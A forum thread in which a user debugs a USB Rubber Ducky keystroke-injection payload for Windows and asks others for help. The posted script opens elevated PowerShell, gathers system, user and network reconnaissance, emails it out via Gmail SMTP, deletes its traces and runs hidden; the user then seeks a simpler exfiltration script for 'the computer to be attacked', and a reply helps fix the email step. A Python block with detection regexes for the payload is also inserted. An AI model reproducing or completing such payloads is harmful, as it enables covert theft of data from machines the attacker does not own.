FULLAUTO Posted April 10, 2016

I am damn frustrated with that Rubber Ducky, it won't work in Windows 10. I tried the Payload generator, I made it work, but it won't send email, and FTP upload won't work under Windows 10 either... I don't get an email and I don't get the uploads to FTP. Everything is correct; is there a possibility that the Rubber Ducky scripts won't support Windows 10 anymore? Even SAVE to Target machine won't work; I used an administrator account.

Mr-Protocol Posted April 10, 2016

Could you post your ducky script? Keep in mind the online generators may need tweaking to get it to work.

FULLAUTO Posted April 11, 2016 (edited)

DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT j
DELAY 750
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem
ENTER
STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime
ENTER
STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)
ENTER
STRING $SerialNo = $SysSerialNo.SerialNumber
ENTER
STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model
ENTER
STRING $SysManufacturer = $SysInfo.Manufacturer
ENTER
STRING $SysModel = $SysInfo.Model
ENTER
STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption
ENTER
STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"
ENTER
STRING $HD = [math]::truncate($disk.Size / 1GB)
ENTER
STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)
ENTER
STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize
ENTER
STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)
ENTER
STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name
ENTER
STRING $Cpu = $SysCpu.Name
ENTER
STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber
ENTER
STRING $HardSerialNo = $HardSerial.SerialNumber
ENTER
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name
ENTER
STRING $graphicsCard = gwmi win32_VideoController |select Name
ENTER
STRING $graphics = $graphicsCard.Name
ENTER
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1
ENTER
STRING $DriveLetter = $CDDrive.Drive
ENTER
STRING $DriveName = $CDDrive.Caption
ENTER
STRING $Disk = $DriveLetter + '' + $DriveName
ENTER
STRING $Firewall = New-Object -com HNetCfg.FwMgr
ENTER
STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile
ENTER
STRING $FireProfile = $FireProfile.FirewallEnabled
ENTER
STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"
ENTER
STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired
ENTER
STRING $UserType = $UserInfo.AccountType
ENTER
STRING $UserSid = $UserInfo.SID
ENTER
STRING $UserPass = $UserInfo.PasswordRequired
ENTER
STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')
ENTER
STRING $Report = $Report +"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>"
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> '
ENTER
STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate)
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report = $Report + '<div id=center><h3>Network Information</h3>'
ENTER
STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)
ENTER
STRING $Report = $Report + '</table></div>'
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME was here!!!', 'PASSWORD was here!!');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'mydamnemail@gmail.com'
ENTER
STRING $ReportEmail.To.Add('mydamnemail@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'Duck Toolkit Recon Report'
ENTER
STRING $ReportEmail.Body = 'Please find attached your reconnaissance report.'
ENTER
STRING $ReportEmail.Attachments.Add('C:\Windows\Report.zip')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING remove-item 'C:\Windows\Report.zip'
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 750
STRING C:\Windows\config-e702b.ps1
ENTER
DELAY 750
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT j
DELAY 750
STRING mode con:cols=14 lines=1
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

> Could you post your ducky script? Keep in mind the online generators may need tweaking to get it to work.

Where I have ALT j it was ALT Y before; I translated it to the German keyboard layout. I don't know what CTRL S stands for, can't find anything related via Google...

And: if I run this script on a computer with a non-administrator account (not guest), it won't work because of the "run as", correct?

Edited April 11, 2016 by FULLAUTO

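A defender who recovers an inject script like the one posted above can triage it statically. The following is an added example, not part of the original thread: it parses the DuckyScript STRING commands and flags behaviours visible in that payload; the rule names and the shortened SAMPLE excerpt are constructed for illustration.

```python
import re

# Indicators drawn from the payload in the post above. The rule names are
# labels invented for this example, not part of any product.
RULES = {
    "elevation_prompt": re.compile(r"Start-Process\s+\S+\s+-Verb\s+runAs", re.I),
    "execution_policy_weakened": re.compile(
        r"Set-ExecutionPolicy\s+'?(Unrestricted|Bypass)", re.I),
    "hidden_powershell": re.compile(
        r"powershell(\.exe)?\s+.*-windowstyle\s+hidden", re.I),
    "smtp_client_in_script": re.compile(r"Net\.Mail\.SmtpClient", re.I),
    "script_self_delete": re.compile(r"Remove-Item\s+\$MyInvocation", re.I),
}

# Constructed sample: a few lines excerpted from the posted script.
SAMPLE = r"""
DELAY 750
GUI r
STRING powershell Start-Process notepad -Verb runAs
ENTER
STRING $date = get-date
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER
"""

def typed_lines(ducky_script):
    """Return the text each STRING command would type, in script order."""
    out = []
    for raw in ducky_script.splitlines():
        cmd, _, arg = raw.strip().partition(" ")
        if cmd.upper() == "STRING":
            out.append(arg)
    return out

def triage(ducky_script):
    """Map each matching rule name to the typed lines that triggered it."""
    hits = {}
    for line in typed_lines(ducky_script):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(line)
    return hits

if __name__ == "__main__":
    for rule, lines in triage(SAMPLE).items():
        print(rule, "->", lines[0])
```

The same regexes can be run over process command lines, but lines typed into Notepad end up in the saved .ps1 file rather than on a command line, so those rules need the file contents.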
Guest Posted April 13, 2016 (edited)

About the email not being received: since mid 2015 or so Google has made a change to their mailservers so that less secure apps can no longer sign in to Gmail. And Google thinks your cmd box is a less secure app ;)

The solution is to change a setting in your Gmail account to allow less secure apps to sign in to your mailbox. You will find this setting here: https://www.google.com/settings/security/lesssecureapps

After changing this the mail option will work.

This is a very long script you have and difficult to troubleshoot. Next time try to isolate the part that is not working and go through the script manually: type in every command manually. This way you can see where it goes wrong.

In this case there would have been an error right after:

$SMTPInfo.Send($ReportEmail)

The error would have been:

The smtp server requires a secure connection or the client was not authenticated. The server response was: 5.5.1 Authentication Required.

Edited April 13, 2016 by Guest

FULLAUTO Posted April 13, 2016 (edited)

> In this case there would have been an error right after:
> $SMTPInfo.Send($ReportEmail)
> The error would have been:
> The smtp server requires a secure connection or the client was not authenticated. The server response was: 5.5.1 Authentication Required.

Hi, thanks for your answer, but I already set the option you said, didn't work... I'll try several options and report back.

If it helps you, I will tell you what I need, it's simple:

The computer to be attacked runs Windows 7.

I need a script which saves the following commands:

tasklist
net user
ipconfig -all

and this command which saves all the installed programs:

@echo off
REM Reference: http://www.techrepublic.com/forum/questions/101-215911/dos-command-to-list-all-installed-programs
echo ================= >>software_list.txt
reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall temp1.txt
find "DisplayName" temp1.txt| find /V "ParentDisplayName" > temp2.txt
for /f "tokens=2,3 delims==" %%a in (temp2.txt) do (echo %%a >> software_list.txt)
del temp1.txt
del temp2.txt
REM type software_list.txt | more
echo.
echo.
echo Installed software are stored in software_list.txt

and if it's possible to send the txt files to my email, as on the computer where I want to use it the USB port is blocked for mass storage devices.

No need of any HTML or shit like that, just a txt file with this info.

Edited April 13, 2016 by FULLAUTO

Guest Posted April 13, 2016

I can only guess what's going wrong. It would be helpful if you can be more specific what's wrong. Tell me, if you insert the Ducky into the target machine, do you see anything happening on the screen at all? You know the machine has to be logged in for this to work, right?

FULLAUTO Posted April 14, 2016

I will make a video on the weekend and show you guys what's wrong.